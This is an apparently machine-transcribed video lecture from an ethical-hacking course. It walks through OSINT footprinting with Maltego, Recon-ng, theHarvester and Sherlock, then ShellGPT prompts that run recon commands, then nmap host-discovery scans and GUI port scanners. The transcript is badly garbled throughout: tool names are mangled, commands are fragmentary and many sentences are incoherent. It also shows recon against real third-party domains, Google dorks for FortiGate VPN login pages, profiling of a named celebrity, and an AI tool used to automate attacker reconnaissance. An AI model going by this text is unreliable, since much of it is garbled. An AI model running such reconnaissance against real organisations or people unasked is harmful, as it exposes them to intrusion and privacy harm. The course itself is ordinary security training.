Just try as modules load. Now done here. Now we have loaded this. Let me just so I was making I can't able to make mistakes. Most load domain stress and bread stress. So I just type here. Now let's look at active information. Get here. Now our is to get the rules. Let it through first. And 8090 posters where we have seen so now all the come please try this. Now I like such as most low being so I would like start now let's start from this we just right here back. So let's try as context. So back here. So whereas most to reverse result. Now a post now try as copy back here. Let's do this and apply it this one. Just run this one. What else we get here? So we have entire so you know all you don't worry. Now it's from here. Just as modules look we just run one. So they know it. Record blocks below. Here not getting it. Let come back here. Now you just appear as a posters. So where the posters because again you can hear appear things. You can hear everything. Now just as try as this look repeat. Then repeat as SMS. Just this one. Those repeat. Now, After you file the drivers, we just said drivers options set a as so set up accordingly to PC Windows Club. Then I just put here as that's it. Then you just type as a result dot html, then enter. That was done. Now you just type here as options set creator. Now your name as you just put as a Windows Club. That was correct. Set customer as I just put as this here. Then next, then just enter invalid name. Next as a short option name. Okay, so it's record the one as Windows Club. Here. So again, I type this option set customer certified hacker next. So if I choose here enter setup, so here I was making here as mistake CU customer network. Then just right here, just run. Then a report is generated. Now let's do here. Open the here. Results.html. You can give the Metasploit network technology a recurrence summary domain area user is defined posters all the results which you have got here. So you can write your own here. That's so then you have everything the result. So until now we have used the recognition to correct network as a target. This concludes the demonstration of post information on the target domain and telling a personal information target organization. So we are printing a target using a MRT. So what is MRT? MRT is a powerful reconnaissance and printing tool used for gathering information about a target. It is fully used in penetration testing as those intelligence, as I said, security investigations. It allows for given passive access by integrating a transport data gathering groups to extract evaluations. So get a multi. Now I just back here. So I'll just type here as multi. So I can download this multi-go Windows versions. So but we have already a as an input. So let me I would like to show you here. So we just come back just as in the search bar multi-go. So it shows a installer. So you just click on this. So it will ask user share a Kali install a package as multi-go. Now you type yes. And you just enter your password. So it will take a little bit 1-2 seconds to install this. Now just type here. So it will take a little bit of 1-2 seconds. So it will install this multi-go. You must press end to finish. So I just try enter, that's finished. Now let's just close this. Now click on the menu, you just type multi. So here is my so let it launch this window. So it launch. So here I prompt for a sessions. So here I want to see a function. You want to see a communication. So you take communication. So I already have a so I need to go for a registration. So you have is registration, then just come. So you don't need to come here. Now I just come back. It will ask. You just click up this on next. So we just need to log our credentials. So it's as credentials here. Now let me look here. So let me just click this and ID of login. Just this one. So go back. So would like to here say browser link where you here. So I think we just log from here. So you just enter your name and password. So just so I just enter which I have created before here. Let's be like here. Then just right. So country just right. I just put so in previous times it's not asking much things. Now only was asking country, phone number, everything. So just just continue. So it's asking too much thing. So get to the browser and return to the application. Now just come back to here. Browser was so just next standard C install a data. So it will install the data sources. Or let's go back to here. Now this was down to so web browser a default web browser. That's it. So you just go next and off. That's right. So now we just click on that. Okay. Now just click as we just don't require this. Just this. Now you can look here a Bitcoin, blockchain, Ethereum node, live address, device like a desktop, devices, computer, information. We have got it here. So from here onwards. So in the search, we just need to search here as to document as website. So here we just drag on here. So in the multiverse, you just to delete this. So you just to find your target website. Your target website is ratio. First we enter here. So we have an account, not account here. So you don't need to think. So just on here, like information, entity or and storing find entity properties, link and of the IP. Just is used and relationship and machines which they have used. Then we would like to do here as I do things. Once and unused something we would like to look here. Like align all transactions. Extract a property from other properties. Define within the properties. Domain within the property to address within the properties. I just need that email addresses. Now started here. Now let me just look here. Now here the graph will be presented. Let's look here. So email address properties as 192, but I get extra property from currently and get anything else. There is to a phone within the properties try to run this. Run transforms, but I didn't get. So that's why we would like to extract everything. Website technology used in this. The access is denied. Your license is not enabled for use this integration. You need to supply an API key or purchase a data file. If you do, we have received this message error, please select export. So there is an error with this update module. So we can't go from here. Is something wrong. So it's go back here. Machines. So resolve relationships. Just click on this on here. Transforms yes connect to a domains. Is we just look here. Asia.com. Where I have got here in this VS files no like copy attach send URL type attach domain details. Now this is not running, but getting that domain operation at the rate of ma domain and I have got it somewhat a useful interface here. I got it because my number. You can look here where I got here. So just make us zoom in. Now just here in this. Now this right here is search historical files, file entity, domain identities we have done. We just here email from the who is info. The entities who is the IBM WhatsApp. The numbers from who is I would like get. Let me just look. I didn't get. So just come back. We would like to cite historical things. I just try to run here. 1 of 6 entities. Let me just look here. What else mentioned here? So there I got it somewhat PDFs. You can look here. Web browser. This PDF. Hub online. Then this is book online. So which now giving some use missions. So here, look like this. Here, this will present it at every. So this is we just this will and we got what else content inside our website. Now that's it here. So here I use now the transformation. This is like the website. Look up the website using doing you like the numbers. Like the properties to GPS, the email addresses I use the team using JSON. So this address to apps you like here. Here I got now I look at the logo as Robin, Sofian Akash, Moisafi, pronounce this because Luo Icho. So we have got this a persons. Then we get it as a relationship also. So just once. Now you can look at relationships in the main is a shop in there's nothing else general case a general this was a date so you don't need to consider a general date. So you can extract any information with every single information out a targeted applications. Now we have identified a process. Now let us come back. Now all transforms we have looked at AVP. Now if you want to look a email address APG to email such email. So yes on this we have got here a so all the main persons emails we have got here every information. Now we just go for look here the files of search using engines the GPS with the property. So it's look as GS let's see this we not it. So even you can zoom out that does not matter. Now let's just look here the phone was the phone number who is info we just look here. It's not work out. I just come back. The website using a domain will no content data URL in the properties. Within the property URLs you can look here. There is an entities. So this URL is where they can get its URL. So that's URL thing. The data in the properties X. Now it runs. It's not work out. So it's running one of the target information or a domain. You can extract all informations. About extracting all this information as an attacker or a penetration tester, utilize this forcing or passwording such things you are damage also. That will be using somebody. So we would like to and another scenario. Standard as a website. Now we just look here as Bitcoin Cash, Bitcoin address. So we would like to look here as a Bitcoin address. There is an even a Bitcoin address. So I just back here. Now let's search here as a blockchain explorer. So we'd like to get any one of the address. So just copy this. So we just copy this. So there is like hash ID and 0 is there is 106 so I just do this. So now I need to come back here. So for API outputs we like to let's do like this so this is to get any useful information. This so because we not convert any point into a property, the exact properties is requesting a coin. Let me just look this. So where I have found this as other target address, so just from here is find any properties. let me just look. It's not. Result IP address. So you just need to check all by one. DNS record. So this is IP. So this is a wrong one. So we just yes. So we would like to delete this. Delete this. So yes. So I would like to ask between it's maybe the transfer exact properties of the input of currencies address. No. Malta's airport. No. Bitcoin. So we just look this. Now so this is Bitcoin cache. So just run this. So it might be work out here. So we need to work on in this Bitcoin to add the properties about FTD. So in this case, a grid of the version not be work out. We just need to take part a paid version. So for a free version, for domain or object, there you can add all the iterations. That's it here. So now, apart from a transformation, there above can occur conversions of email who are social network services, Facebook, Gmail, or extract all personal information by extracting this from single actions, Cybersecurity like which may allow you to system and gain a credentials. So this concludes the demonstration of footprinting a target use app. So the next topic is print a target using OSINT framework. So this is a OSINT framework. It involves using tools to collect publicly available information about the target. OSINT framework is a set of a script or open source intelligence task. Particularly, you are a reconnaissance doing a penetration testing or cybersecurity investigations. So we will do here. Now we would like to come back to call an exclamation. I just make it a little big. Now, okay, now let me just here. So, if you don't have this type here as well, so we try to install this. Let's test. Now, it go for installation. Let's see. So it may take a little bit time to download all this data. Now, first, look like this was installed successfully. Now, let's try here as a yes and enter your password. That's it. Now just try. So to identify a domain, so just try here. Identify, then it. Now let's begin to look here. Now this was done. I just try here. 25 minus 7. Now 25, like we would like to put a type of name. We would like this one. Now just try here. Now we just need to utilize a domain 5 minus 10. Here you need to present a domain. So in this case, I just need to put as a Asia minus T. Now let's be back to here. Now it will the OS framework by Gacha right. Note that all minus T. A search may take 3 to 5 minutes if this tool may try narrow answer using T. Now this is done here. Now let's be back to this. So this is a domain file. Now we want to do here is the tool remove all things using the address related domain using the mesh. Put the identities in the database of target website. Launch a web application access. Now this is done. Now the next one is you can see here we are getting a lot of questions. We have got with retarget IPs every. Now our next target is this is done. So this is done. This is not a second of results here. So this one drawback here. Now what we have got this now we would like to try as another. So we would like to try as a similar like we use a people search and any other things. Otherwise we would like to look as a search file. Search file we will look here. So where we have a search file as you and we just need to put as a username as a username. So where we use a shell log to search all the information. So I just guess now let me just look here. So So we have got a somewhat a useful. Now we start as a sum. So now we just start as clear. Now chip 5, I just put as a another like let's build like a loop. So when it was given a multiple things, it was using like bubbles and abstracts. It was a lot of things here. That's okay. Let me just look as I just here as clear. So the G5 will such the user gets the social network accounts will provide the assistance of the user. This profile links are at user. It can be used by attackers to control internet. Now, we use web frame. I think that would like C5 register upon the given server. So I just would use as yes, I would guess like no, it's not this. So this is it. So as far as in this information about email uploads, as email uploads, just as so just put here as hello at the rate kind of fun. Let's so it not work here. Okay, just I close this or just write here as 25. Just enter target number. So I just try random number. Let's just here. I'll be able to do this. So that is not useful information. Now, the last one has 85. So now, explain using interpretation using provided URL. So all concludes or demonstrate the information that user alias a multiple social media platforms using the web. That's it. So that's now we are discussing about putting a target using a build cipher. So what is a build cipher? Build cipher also in a intelligence tool designed for information gathering on website and servers. It's primarily used for everyday mechanisms during a pen testing. So we would like to get this part, so just randomly copy. Now let's do what we want here. Now here we just paste this. So with this, sorry, we would like class cipher. Let's just go back here. So we just need to get it from here. So just flow repository. Okay, just copy. Nice like us a flow. Apply stuff. We will clone the repository. But this is done just like us. Give cipher just like us. I just write as v3 start requirements.ext. So we have to install the requirements. That is done. Now let's write as clear. Now just as button 3. We start here as cipher.start where it will here. I want to collect information about website address. So we type a website. Now enter the website. I just type my target information. Now you can hear as DNS lookup. Where got the DNS lookup? Do you want to like yes? Just type again here as you just type as data. So you just every time perfect here. We use IP subnet port scan, machines, etc. This all informations you can hit here. So you want to write again. Let's try as website. Now just type as now I'm going to when I'm in the beta. Now I so it's the same fallback is right here as a now first info scanner. Now just let's do it. Now we was giving all the information about this. So you can see all the information here. Like it was not from there. A web report. Some ways. Yeah, that's great. Let's start here. Yes. Now try website. Now just try. Now here we will submit reports. Now we just scanner. Yes. I'm actually so then it was our here. So software items for creation is this one. Everything. This latitude and longitude. So where it was given everything here is here. That's great. We can write another one, just write the website. Now, reverse IP will copy like this. It's not active. So these are all information here. So you can try all these things. That's it. So similarly, we use information options to gather information about a target. So this computer demonstrates to target a website using build site. So now we are going to discuss another topic is a food in a type using OSINT framework. So in this OSINT framework, the collection of tools and resources designed to gather a open source intelligence on target such as a person main IPS organizations. It organizations a numerous OSINT tools into categories for a different consensus task. Make it easier to navigate and use. So first we would like to work here as OSINT framework. So let's just write as OSINT framework. So we just work here. So this is the framework. So if you want to gather the OSINT framework, now you look at it just process. So this is in framework. So you click on here. You can look here if you want to gather in use. This usernames are in, so just click on this. What's my name? Then check no EM search.org. What's my what's my name? That's there. So there are particular things here. Now it will take third party applications where you can check your targeted objects. You can get from there everything. So it all we can't look up this one. Now I can look at as name checker. So you can check here as name checker, like you can check task. Now let me just write here. It will entirely where it is available. Then you do the link. Okay, you need all of that. This was done by just so you so compare and email us. So now you would like to look here email like that same I've already shown you. This is a big certain plan. So you have to purchase this one for doing one. So let me we do this email to us NinjaRAT. So this is also same get delete for free in our target domain. So where we can send leads info.gov they directly can help we already about info. So there is also available with the info.I domain must get as a target domain. You just can search this info. So not put anything here as Google BGP Lexing by N. Otherwise just for this and I have made now we just like you have really living right tomorrow. So it's only this is 1 hour per day using it based on support. If you want 100 minutes per just also $99. It's like quite it may give you writings or not writings where you can utilize the social media. Sign in, enter email as a company and the people find it so much like this. This so they have here state of I have got a little bit information about this. You can look here email@gmail.com. So where we have got the information. Yeah. Now the set now I just back here email. So every information we get here. So read.com if you know anywhere you to sign up. So all information and it is here email us their names. You can help with records so if plenty of tools is available here to do the process here. So you are expand all information is available like like here this is that I can images and instant messaging people searching LinkedIn is also available. You can like short farms and books here every information you can find here. A telephone number, public records, business cost, transportation, general searches forms. So you like to get searching like Boria Omega. So what is this? We would like to try this. So this is like a big data. So we don't want this. So here. So you can also use a footprint tools like recon footprinting. Utilize from here and you can get it what else you are targeted required you want like experts and advice here default passwords database get default passwords database. You can hear everything about so the default passwords the default password look usually like default passwords there's open system so this is just my thread. So when discuss here before you can look here this you can observe where the attack is came from here. So this you need to study in depth, then only you can understand. If you try to get started, what is attack means? So you can understand from here everything. That's it. So similarly, you can explore and available categories about here. Then the tools associated with each category using the tools. You can perform a footprinting on target organization. This concludes the demonstration performing a footprinting through OSINT framework. That's it. So guys, now we're going to discuss about footprinting using advanced hacking techniques. Attacker can leverage AI technologies to enhance their footprinting task. With state of date, attacker can effortlessly use Google techniques to acquire valuable facts out there. For instance, attacker can use AI techniques such as GPT to perform this by using a prompts such as like GPTs to what is what. So let's try to perform. Now let's yeah. First of all, we would like to discuss how we create an AI with API. So to visit this starting, let's create an logical plugin where you need to create here, and I have just asked $5 as minimum. So I think you want to first that API with minimum of $5 a request that we are doing. That's enough for you to have certified hang with the AI. So let's you have to now. So first of all, we would like to open. So this open a source which are giving back. I just install. So install is like as a like. Let me just clear it out this thing. Let's type it out. Let's just type it as SGP. It will ask API like you like like after the news let me put here as a Windows Cloud. Then I select a project is a default. So you just need to read and write purpose so we can so you are able to change this. So let's click on a great that's it. Now you just need to use as secret key. So this is mandatory. So you don't need to you need to save in one more time. So let me I just close this. I would like to like I open a so X as none has a let me just stop this. Let me put here as under X. So once this is done, just my key is not good here. Once this is done, accept. Hello, how can I switch you to it? If you haven't promotes, otherwise if you don't have credits, it will not show anything else. So you are done. So now your first task. So what is your first task? Now your first task is like printing. So we have to do the printing everything than AI now. So it is mixed everything. This is particular hacking. It's like 30 words, 40 things. I made all the bits with AI where I'm doing some of the things that are done here. So let's just class a SGP. You just type it as chat. Now we are doing as a footprint. You just here as a footprint. And just type a shell. You just type here a file. You just type as operator to obtain device and target website. And target website. What is your target website? My targeted website is bbc.com. And store the result in the bbc.txt file. That's now we would like here. So now this is it as a call with a good search with the execution of bc.com with the file with grp output with the bc.com. So we just here as e for execute. Now it was executed. Now just type a bbc execute. Now you get anything else from here. So if you copy this, copy the source of link, just open the link. You look here. But you have got the URL, value URL. It is Google. It's download 1922. Let's we would like to look here. What is this? Let's be engineering. So let's look. So once you have registered, that is printed here. So that's it. So I think I have given the right to store. So and store the result in the .txt. Given the current as what it is FCR. So you just do here and you need right now. Get a required. Okay, that's it. You can get it as a history of will present not a stored because with an history with the chaos. Even if I can have a base post name and channels and files something. Let's we would like now let me try as a I have to say I cannot install as a so more otherwise not to be getting type output results. Okay, install this. Let's try here. Now we have to sometimes so if you get the command is let's be like here. I just put here as a cat zero. So we know we just remove zero where it was for the hack feeling. So that's what I like to as with like GPT then you just like a footprint. then as a shell, just as a use. I have used here a bit as I wanted to get here. You are then you as such operator to take 14 people. Let's look here. What is let me execute? Here a mode is not presented here as an out. We can get here also we will get here only. So in this, we have as something like a this video. So where I have like a software with the chapter we will have as with the EU is such as obtain the alternate login. Yes, so we wanted it here as what we login is next. Let me just share this one here. Full login is type scan. We just so I have my address. I have got resource. It's history service enabled renewal with a and with the search. That's what we have got here. So if you put this on the board and get exactly what you have looking. So it's designed to subnet. So now we can look as where's so let I will try something LY. So the was just here as what is the input you have here? HTTP google.com. Then let me just put here as a search underscore q. A query URL. This is shop outline put here as normal as a remote plus as okay. Botnet, FortiGate, SL plus VPN. Now you just type here as HTTP as HTTP. You just put here as a cut. Let me. I would like to try as this one. GREP as a output. Let it go to as the stream. Let it go with this. Let me, I just put I think let me I would like to let's I don't want to go until just until here this let's we would like to clear. So where you have got here please login as just dot 40 DNS remove login with SL PL. So let's log in. So observe from here. Let's just copy from here on the link. Let's do like so. I didn't get anything else from here. Let's we would like to try as one more in URL as here as a FortiGate. You got here as a FortiGate, that's it. So add URLs with a FortiGate firewalls. So everything you have got here. Access UK. So this is only a glossary, just for a one here. That's it. There is nothing else apart from here. So this is as a in URL with this. That's it. So you can also try as entitle as FTPs entitle many things as FTP logs with the ChatGPT, so that you can get multiple things from here. That's it. So this is the first step about footprinting through as AI. That's it. So now somebody is over close this. Now we would like to get just type as here. So this is not required. Let us remove this. I will just for companies top level domains as TLDs and domains using with the AI. So finding a company's top domains. Attacker can liberate power analysis to and automate a booting task. The idea is can effortlessly find top level domains and subdomains that. Like we would like to discover a Airbnb, otherwise area. Let's would like to utilize as a chat. Just need to specify here, not a printing. Now you just need to type here as a now just type here as a shell. You just type here as a discover all the subdomains of AirAsia.com. So let me I just need to present here as we want to use as a dig command. We would like to try to enter here. Now we would like to try here. We just try here as a execute. Do not get address of servers. Address of area does not form. Okay. We would like to try a dig. Okay. So here we have a AirAsia. So we getting done as Asia. Now this case as I have to work. I would like to view here as a google.com. Let's just try here as a google.com. We will like try here. So let us dig a example with it's coming as something. Now only as in only there was presented here. That's it. Now I would like to try here as something. So let me just put here as SGPT. Just put as a chat. Then we just put here as a footprint. Then we just put here as a shell. I would like to use sublist list of domains of target organization. So the target is if that we would like to look here. Second is 3 Airbnb okay, like visualize a file. Let me out here take the file. So now you just write execute. Now you can look at it. Everything is working. It is working there. So all this is generated. There is more there. I have here. Practice using like service any is yours. So you can use in the one way. This guy. Now, now, being as hard email is a I can get what wants to with the a plus a value details of the data. So if you are a guy, we would like to with like us clear just start to give a like go for a point, then just as a shell, then what you just utilize as a use as the harvester. Then to gather email accounts associated with what is associated with the Microsoft Post device. I would like to put Azure.com. Let's try it as Azure.com. Then otherwise it like as Azure.com. So then as a limiting a 200 ranging into as a source. So you can also give multiple sources. That does not matter to Google or Microsoft. What is web browser openly? This is your wish. Let's do like here. Here as execute. Now it was you that targeted URL. Let's look here. What is the output we can get here? Now it was searching in the file where I find host is fine. That's it. There is no case is fine as something else. Okay. In this is one case. So let me ask here. Now I go here. I like to teach the name. Let me like put here as type hacking.com. Let's be back here. Let me just do this. No results for icons out of firewall. Let's put here as let the Microsoft like then so let's get the cloud file. You can also observe and you can get here from where get here like you just type here as books. You can also find here as a non-social search engine. Find a most shared content on the topics author or domain. So plus free to recommend you to your name looks for recommend all things. So utilize EVA and yeah. So That's like to what hazard. Now, let's back up. So, we would like to bring a social network science using a AI. So, we would like to find out a particular username to search with. So, there is a lot of things name called a Sherlock that can find with a username multiple social platforms like Facebook, X, and YouTube, etc. So, I don't use like sure yes, X, Telegram. So, let's look here as attackers can leverage AI technologies enhance and automate their food task. The AI attacks can effortlessly use social networking sites to acquire valuable information. So, let's like utilize as first we just here as repeat, then this was a chart, then uh, let me just check this here. You just put here as a repeat chart, print shell. Now this here as a use shell. So let you like also look your another end Sherlock is installed or not. Just type yes, enter your password, and you just type yes. So you just need to install the tools also in the sub end. Otherwise, you cannot able to execute this one. So this is done. Now let me start here. Just write as a Sherlock. So this will work out. Okay, no worries. So let me just check. Now to get personal information about who you would like to ask. You would like to ask like you would like to ask like okay, how to name call like so otherwise you are like that I would like such not every time is famous just popular uh Justin Bieber. Okay, let's move back to here as a Justin Bieber. So as you use Sherlock to gather personal information of Justin Bieber and save the results in the .txt. That's what I want. Let's we like to look here. What is the we would like to get here? The name now Justin Bieber. So where we have got it here a profile information. So this will be display everything. So Cybersecurity is do with penetration. Let's we would like to look here what is the output we can get. So it's a lengthy time process because a Sherlock is utilizing as here. So first the command I gave you just send an ChatGPT, so that ChatGPT will gather information and then will give you a browser and browser will present to you your tab. So we have got here code forces color lover s.com expose. So you have got a lengthy of things expose gamer tag. So he have also expose also. Now so here as a cat jb.txt. All the results is stored here. You can look here. That's it. So here is helpful for hacking. That's it. Let me look another thing. So now we have to so another name for DNS to come A. An attacker also use a leverage of a AI charging or generated technologies to perform this task using appropriate error such as DNS. So we will install a record in our system. Now let's do like for as a SGPT. We just put here as minus chat. Then just put here just put here as minus chat. Just need to put here as a install and use DNS record to perform DNS enumeration on the target domain. So you just need to present your target domain like let me just browse a.com. That's it. We would like to look at what get should apt get install DNS record or DNS record -d and enter your password. Now let it go for our installation first. Then let for enumeration. So you can give with AI as a right prompt. So with chat with shell.
and you present what is your right, like printing or something else. So if you provide the right thing, if you do the right necessary things, it can do anything for you if you purchase. If you not purchase, they're not going to do you anything else. So if you try your own, like GPT, what I would like to tell you, in the open source, in the open, not because it violates certain conditions to the charge. So let's wait for this. Now, it will present all information. Let's you here a DX department enumerated for any records. And type the chasing. So where you have got the identifiers. That's it. So they are available with an MongoDB is installed. So you can also exploit that. I can show you there how you can exploit that one. Okay. Now, if you would like to, that's it. So you can also utilize multiple things using this. I would like to try here as clear. SVP. Let I would like to here as let me. I would like to use a net discover to perform network enumeration on the target IP address. So just IP, then I can change the address. So this was a reverse 192.0. Let me try here. Let me try here as except now it was executing as right click. You don't need to worry. It's extracting information about it. So here I have a laptop. This for registered technologies for Samsung. So it was executing everything like that. That's it. So now that's it. Yeah. So now we are going to as a traceroute with AI. An attacker can also leverage AI generated GPTs. So to perform a network printing before errors with part of a target host, I would like to present my target host as Asia. So it has as a would like to try as this one. Let like this as a chart. Now I just put here as a print. Then you just type here as a shell. Then we would like to utilize here as to perform network trace routing to discover the domain, discover the routes on the path to a targeted host. So target host name is your host is aasia.com. aasia.com. So that's it. You just enter, then you will ask for execute, just type as execute. Now it was getting here everything with a trace route. You can look here, that's it. So this is my static IP address. Then where it has this this is Asia with Hong Kong. This. So we can wait here. That's it. That's the result we can got here with the trace route with AI. Network trace routing. So what is trace route process? I can execute a trace route to find the IP address of a device such as a routers and firewalls and present between a source and its destination. For example, running a several routes, an attacker might open a file information. So where we are seeing with the ChatGPT. So I'm not using any concepts, exits. I'm utilizing only the ChatGPT that you see here in the live. That's it here. So guys, now we are going to discuss about a scanning networks. So what is a scanning networks? So here, network scan is a critical phase of ethical hacking and penetration testing. It involves identifying a live host, open ports, silences, and vulnerabilities in network.
This process helps to access the security posture of a network and identify possible endpoints of attackers. Like, what are the goals we would like to look here? Like identify a live host, like a discovery devices connected to a network. Detect open ports, like identify ports that allows a communications and may be vulnerable. Service enumeration, so like determine the service team and open ports like HTTP, SNMP, and many other things like MySQL server. Everything we can look here. OS and detection. Identify the operating and software use. Vulnerability assessment. Find weakness that could be exploited. Now, we can see here, like, we would like to look here. Types like we would like to do a port scanning and vulnerability scanning and network mapping. Then here, as a we would like to use a Nmap is an open source and net discovery and security tool. So first we would like this one. In this, we would like to find like a TCP connect scans, steal scan, UP scan, pin, XMS scan, null scan, everything. Like service simulations, we do also like FTP, DNS, HTTPS, and HTTP, and everything. Like, now, we also use a gen map, maybe a required. Then Nisus, maybe a next session, we would like to use that one. Wireshark, it's mandatory. Wireshark, we would like to identify a Wireshark with our all available in your target network. What are the available things we can also get from here. Now, we would like to try as banner grabbing also we can do here. Now, we would like to do a put that here. That's it. So this is just a basic introduction about scanning networks. So, now, we're going to discuss about a host discovery using Nmap. So, Nmap host discovery process of identifying active devices or hosts within a network. It's often the first step in a network reconnaissance, allowing an ethical hacker or network administrator to determine which devices are online and reachable. Like we would like to identify hosts, like using like ARP ping scan, UDP ping scan, ICMP ping scan, ICMP echo scan, ping times ICMP timestamp ping, ICMP and address mask, TCP ping scan, IP protocol ping scan. So I'd like to discuss all those things here. So first, would like to just back here. You just open your Linux machine. So for a backup or something, I would like to open my Windows. Now let's come back here. Just power on this. So this is not powering on. Now let me just utilize this. So sometimes maybe I get error, so you don't need to get surprise. I just come back here. Now I just start with this and I just try clear. I just come back CD and I just try clear. So you just type your sudo su, enter your password. That's great. So password is wrong. Now I just came to my Windows and I just type here as Ctrl Alt Delete. So I just enter enter my targeted things. Now I just make it as a little bit big. Now I cancel this. Let me just go there. So first of all, I need to identify my target IP address here. So I just open the command prompt. Now you just here as switch to 168.18.127. Now let's back here. So first, we would like to use LP scan. For this, we would like to utilize here just type as nmap minus sn minus pr. Please paste this. No, it not work out. 168.18.127. So where is in my Windows is 127. Now let's come back to here. So this is the IP address. Now I can look here. There minus SN device disable port scan, minus PR performs the ARP ping scan. So the scan results appear, indicating the target host is up. You can see host is up. Let me make it a little bit big. Host is up. The ARP ping ARP request to the target host. Attacker response the host is active. Now we would like to security scan. So the same similar R place. I just specified minus U. It's a UDP. Now the UDP send the UDP packets to the target host. A UDP response means the host active. Host if the target host is offline or unreachable, various message errors occur here, such as ETL exceeded, could not be returned, or something else. What else we can get here? Now, we would like to perform ICMP echo ping scan. For that, we would like to utilize as in this U place. I just need to put as E. So now here, the ICMP echo ping scan involves for sending ICMP echoes to a host. If the target host is alive, it will return the ICMP echo replay. This can be useful for locating an active device by determining if the ICMP is passing through a pipeline. That's it. Now we are going to perform an ICMP echo ping speed to discover live hosts from a range of a targeted IP address. In the terminal, we would like to try here as I would like to put here as 0 to 23. That's it. Now we would like to look here or whichever the host is active and up till it was presented here. So the ICMP echo ping switch is used to determine the live hosts from a range of IP addresses by sending ICMP echo requests to a multiple host. If the host is alive, it will return the ICMP echo reply. Then we would like to try here as perform ICMP timestamp ping sweep scan. So ICMP timestamp ping sweep scan ping is an additional type for ICMP ping whereby the attackers query a timestamp message to acquire the information related to the current time from the target host. Or just here as PP. Now let's do back to here. So where we have got here. So apart from the network scanning techniques, you can also use the following scanning techniques like ICMP address mask ping scan. So this technique is an alternative to the traditional ICMP echo ping scan, which were used to determine whether the target host is live, especially when administrator block the ICMP echo ping sweep. Now we'd like to show you this. Yep. So where you can get here, yes. We can also use TCP acknowledging scan. So this technique sends a TCP acknowledge packet. The target host and RST response means that the host is active. The RST response means the host is active. Now we would like to look this. I would like to put here as 127. Now I just specify here A. Now I can look here host is up. Now I see IP protocol being scanned. This technique sends a different group of packets of different IP protocols of the target host. In response from a group indicates that host is active. We would like to look this where host is up. So this concludes the demonstration of discovering a target host in the target network using various host discovery techniques. So now we are going to discuss about another tutorial. Here is perform host using angry IP. This is an angry IP. So angry IP is an IP call and user friend host or network scan. It is alerts on internet and the basic information such as host name and MAC address. Everything. Now we would like to look this up first. We would like to open the IP scanner this one. Now let me I just open this IP scanner. So let me I just install this. So just click on next, install. So once this done, just click on finish. Now let's come back here. Go back. So if it's not available means you just type as angry IP scanner. Now you just click on next, then it goes here. So you just close no. So you just need to enter your target, right? There's 168.18.02 255. Now just count here everything. Now scan a ping method. Just like combine UDP sequence and you just compose displays nothing else. I'll stress as a ping only. So I would like to get only a ping only. What is I like in my system? That's it. That is your icon start. Now you can here where with an open ports everything. So now you can here you can get all the information. This may take a little bit time, but we can get as early as possible the results here. Now you can look here. So we need to get as completed yet here. So once this is complete, then we can know everything. So this was completed. Now I just close. So here in this case, let me I just make it a little bit big. So where the port is key, this is main. We have macro. And then this for Windows, where our Windows are run here. This is the Windows which he was described. So it's not called. Here let it be. Then this is I don't know. So where this and all mobile phones or something else, got it. So you can also use other ping tools, such as solar energy toolsets, net scan tool pro, and WhatsApp ping tool, and it should be tested also. That's great. Now let's we like to look this as one. Now let's come back here. So we have completed this in so now let me just. So guys, now we are performing a is perform a port service discovery using mega ping. So what is a mega ping? Mega ping is an powerful network access tool used for network discovery, port scanning services, enumeration, and troubleshooting gigs. It provides a wide range of features such as a ping sweep, port scans, and detections in an easy to use a graphical user interfaces. That's it. Now, first, we'd like to install the megaping scan. So this is megaping scan. Let it be just right. Yes. It will take for installations. Now just click on next. I accept and click on next. Instructions done. Now it's launch. We need to go for launching this. Here is megaping. I just write yes. So for this, just wait for 18 seconds. Here. You just click on I agree. Now it will launch the megaping. Now you would like to select here, like first you would like to go to system info. In the system info, it was available that we displayed all here. So just click on protocol. So it will be displayed all the information. Now we would like to select the IP scanner 82 to 54. Okay, the range. You just need to click on this feature has been disabled. You need to restore megaping to enable this feature. No. Post. I'd like to put as ping only. Remote name, show a MAC address also. Let's try this. So let's go on again. This one somewhere. So here it will be displayed all the information. Why it was disabled? We not yet use a default. Now let's we would like to try here. So in the basic versions, we not get here anything else. We would like to try here. So here it may list all the IP address which was available in giving a ping and which we not giving as ping also. NetBIOS scanner. Let's try here. 168.18.0 0. Now let me. So it not get as results. So in this case, if this is not get result, I would not form this one in the finding system in the virtual machine. So let just close this. I just power out. Let me run again. Run this virtual machine. Enter. I just type VMware send control and alt. I just type here as work at the rate 2024. So let me just put this on cancel. Now let me I just open here Firefox. Now let me I would like to come tab just type here as mega big download. I would download here this one. Let me go back. Just from download. Download a mega. Now let me please install here. Let me just check that. It was starting for preparation. Just try click on next. Next install. So it will come for installations. That's fish. Minimize this. Now we would like to wait here. So you don't wait until you get here. So let's do this. Now you just click on I agree. Now it will start here. Everything. Now in the system info, where it was present here. Now you just try here as 192.18.0.254. Now let me I just start here. So you can see here one machine. So that may not give a right result. So here I have got here every information. Now we would like to here complete 254 address in 15 seconds. That is done. This is 64 type seconds. So now we just look at this 127, this is 16, 41, 55. Here we have everything. Now we have this. Now we would like to search the port scanner. Now I just need to try here port scanner. Enter destination address. So you can enter your target address 192.168.18.127. So it's by your local machine only. Now it was scanning here. Now let's be back here. Where you can look at it was displays all the informations. So it was scanning where this NetBIOS is open. You can see that's it. Here. So being a list a port associated with my targeted IP address. So even you can mention any target IP address here. You can make here everything here. So this concludes the demonstration of discovering open ports on the target IP address using the mega ping. That's it here. So last, we are going to discussing about perform port and service discovery using NetScan 2 Pro. So NetScan 2 Pro is a comprehensive network analysis tool used for a network reconnaissance and troubleshooting scan. It combines a variety of tools including port string, service selection, ping sweep, lookup, packet tracking into a single interface. Now, you would like to look this one. Now, first we just go for install NetScan 2 Pro. You just type yes. Next. Let's type this. Next. Now we are going to install this one. Now install. It's done. Now it's I finish. So now it was launching. Your typepad has been expired. If you believe this is one error, so just click on OK. So here not this is not updating here anything else. So it's okay. If this is not yet in my mail system, we'd like to go and deploy the virtual machines. So that's great. Now let me I open my virtual machine. Just click on OK. Now it was anyway. Now just make it as quick. Nice show, but yeah, now just right as NetScan 2 Pro download. So if you would like to download this, download NetScan 2 Plus. So just click on download. Now let's just come back here. Downloads. This we would like this. Now let me just open this. Let me just here as extract here. So it was extract here. Let me just type it. Now we got extra. This one next. So it is all here. Now we launch here this way. We just got a start arrow. Now we would like to utilize the start arrow to scan. Now let me choose this one. We will try this. Now we will just inwards up. So you can catch ping and everything. For instance, everything before this. I would get in the command icon. Just need to so I would like that here. So now we would like to hear as like here as pixel. Now you just solve your difference. So and so and then end of the everything straight and click. Now you just stop. You just now response. We get all the information. This is really it. So I can open with an so on this then assemble there. This is running system 11. Interest transporting zero. So from this is we to do is as like to cut here. Like this which was done like ping scan is at this cut across enter 